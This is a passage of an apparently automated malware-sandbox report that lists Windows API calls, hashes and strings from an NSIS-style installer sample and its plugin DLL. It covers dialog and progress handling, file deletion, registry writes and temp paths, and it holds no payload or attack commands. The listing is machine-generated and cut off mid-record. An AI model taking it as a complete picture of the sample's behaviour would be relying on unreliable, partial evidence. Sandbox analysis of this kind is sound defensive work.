                                                                            • DeleteFileW.KERNEL32(?), ref: 004028A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
                                                                            • String ID:
                                                                            • API String ID: 64603807-0
                                                                            • Opcode ID: 0ae5610b60e6d4e17f9dac3ea963c7d8fcfadd954a58792ee9e4497ece00f648
                                                                            • Instruction ID: 618f9bc0fb3bf7a155370674c03f3081ddbeebb813ad2def4b435a70289f4265
                                                                            • Opcode Fuzzy Hash: 0ae5610b60e6d4e17f9dac3ea963c7d8fcfadd954a58792ee9e4497ece00f648
                                                                            • Instruction Fuzzy Hash: D4215C72C00118BFDF11AFA4CD89CAE7E79EF08364B14463AF5147A2E0C6795E419BA9
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                                            • GetTickCount.KERNEL32 ref: 00402D53
                                                                            • wsprintfW.USER32 ref: 00402D81
                                                                              • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                              • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                              • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                                              • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll), ref: 0040525F
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                              • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                              • Part of subcall function 00402CFE: MulDiv.KERNEL32(0001E4F1,?,00023D98), ref: 00402D13
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                            • String ID: ... %d%%
                                                                            • API String ID: 722711167-2449383134
                                                                            • Opcode ID: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                                            • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                                            • Opcode Fuzzy Hash: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                                            • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                                            • GetMessagePos.USER32 ref: 00404ADF
                                                                            • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                            • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                                            • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                            • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00401D44
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                            • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                            • String ID: Times New Roman
                                                                            • API String ID: 3808545654-927190056
                                                                            • Opcode ID: 328d0a0e3b8fd706af101f3e54d1a8063c16bff27e2a5ea666199fad01018b80
                                                                            • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                                            • Opcode Fuzzy Hash: 328d0a0e3b8fd706af101f3e54d1a8063c16bff27e2a5ea666199fad01018b80
                                                                            • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                            • wsprintfW.USER32 ref: 00402CD1
                                                                            • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                            • API String ID: 1451636040-1158693248
                                                                            • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                                            • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                                            • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                                            • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                                            APIs
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                              • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                            • GlobalAlloc.KERNEL32(?), ref: 10002397
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2298730471.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.2298660622.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2298760809.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2299093531.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                            • String ID:
                                                                            • API String ID: 4216380887-0
                                                                            • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                            • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                            • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                            • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                            APIs
                                                                              • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                            • GlobalFree.KERNEL32(?), ref: 10002572
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2298730471.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.2298660622.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2298760809.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2299093531.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                            • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                            • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                            • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                                            • wsprintfW.USER32 ref: 00404A70
                                                                            • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s$&B
                                                                            • API String ID: 3540041739-2907463167
                                                                            • Opcode ID: caf30eb243818e554a1bc62297d78279ecb515a66f5f6d95e05013f04c063739
                                                                            • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                                            • Opcode Fuzzy Hash: caf30eb243818e554a1bc62297d78279ecb515a66f5f6d95e05013f04c063739
                                                                            • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                                            APIs
                                                                            • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nseDB62.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nseDB62.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nseDB62.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateValuelstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nseDB62.tmp
                                                                            • API String ID: 1356686001-1010241614
                                                                            • Opcode ID: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                                            • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                                            • Opcode Fuzzy Hash: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                                            • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2298730471.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.2298660622.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2298760809.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2299093531.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: FreeGlobal
                                                                            • String ID:
                                                                            • API String ID: 2979337801-0
                                                                            • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                            • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                            • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                            • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                            • GlobalAlloc.KERNEL32(?,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                            • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2298730471.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.2298660622.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2298760809.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2299093531.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                            • String ID:
                                                                            • API String ID: 1148316912-0
                                                                            • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                            • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                            • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                            • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                            • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                            • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                                            • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                                            • Opcode Fuzzy Hash: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                                            • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                            • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                                            • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                            • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00405999
                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 004059A3
                                                                            • lstrcatW.KERNEL32(?,00409014), ref: 004059B5
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405993
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
